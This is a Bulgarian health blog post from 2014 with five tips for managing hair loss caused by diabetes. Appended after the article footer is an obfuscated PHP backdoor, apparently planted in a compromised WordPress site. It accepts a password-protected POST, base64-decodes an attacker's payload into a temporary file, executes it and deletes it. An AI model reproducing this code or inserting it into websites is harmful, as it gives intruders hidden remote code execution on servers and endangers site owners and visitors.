Как да се борим с косопад, причинен от диабет | Косопад

Как да се борим с косопад, причинен от диабет

kosopad-prevenciq

Диабетът е състояние, при което тялото не произвежда достатъчно инсулин. В резултат на това кръвообращението намалява, а нараняванията трудно зарастват. Тялото не позволява на опадалата коса бързо да се възстанови. Всеки човек губи средно количество коса дневно, но тъй като организмът пречи да растежа на новата, много диабетици страдат от оплешивяване. За да го избегнете, ето какви мерки да вземете.

1 . Консултирайте се с лекар и го накарайте да ви направят изследване, ако имате обилен косопад, но не сте с диагнозаkosopad-merki диабет. Колкото по- бързо ви кажат каква е причината за косопада, има по- голяма вероятност да се справите и да го спрете, преди да ви нанесе щети.

2. Ако вече имате диабет, а някое от лекарствата ви има като страничен ефект косопад, поискайте от лекаря да ви го смени. Много често лекарства причиняват загуба на косата.

3 . Взимайте предписани ви лекарства, които действат срещу гъбички и бактерии, които най- често предизвикват косопад при диабетиците. Тези лекарства могат да спрат косопада.

4 . Опитайте се да се успокоите и да намалите стреса, който също е сериозен причинител на косопад. Диабетът може да увеличи стреса, затова е важно да почивате добре и да спортувате редовно – поне по 30 минути дневно.

5 . Хранете се здравословно – с по- малко мазнини и с повече плодове и зеленчуци. Така ще поддържате нивата на инсулина нормални и ще намалите косопада.

23. май 2014 10:58:13 от Надя Колева
Категории: Косопад – Статии | Етикети: , , , , , , | Напишете Коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}